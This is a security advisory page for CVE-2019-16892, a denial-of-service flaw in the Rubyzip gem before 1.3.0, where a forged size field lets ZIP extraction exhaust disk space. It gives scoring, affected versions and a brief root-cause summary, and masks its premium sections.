Miggo Logo

CVE-2019-16892: Rubyzip denial of service

5.5

CVSS Score
3.1

Basic Information

EPSS Score
0.46412%
Published
9/30/2019
Updated
11/17/2023
KEV Status
No
Technology
TechnologyRuby

Technical Details

CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
Package NameEcosystemVulnerable VersionsFirst Patched Version
rubyziprubygems< 1.3.01.3.0

Vulnerability Intelligence
Miggo AIMiggo AI

Miggo AIRoot Cause Analysis

The vulnerability stems from missing validation during ZIP entry extraction. The GitHub patch adds size tracking/validation in create_file and introduces the validate_entry_sizes flag. Pre-patch versions lacked these checks in the extraction flow (create_file/extract methods), making them trust the spoofable header value. The test case in file_extract_test.rb explicitly demonstrates how extraction could write more data than indicated by the forged size field.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

In Ru*yzip ***or* *.*.*, * *r**t** ZIP *il* **n *yp*ss *ppli**tion ****ks on ZIP *ntry siz*s ****us* **t* **out t** un*ompr*ss** siz* **n ** spoo***. T*is *llows *tt**k*rs to **us* * **ni*l o* s*rvi** (*isk *onsumption).

Reasoning

T** vuln*r**ility st*ms *rom missin* v*li**tion *urin* ZIP *ntry *xtr**tion. T** *it*u* p*t** ***s siz* tr**kin*/v*li**tion in *r**t*_*il* *n* intro*u**s t** v*li**t*_*ntry_siz*s *l**. Pr*-p*t** v*rsions l**k** t**s* ****ks in t** *xtr**tion *low (*r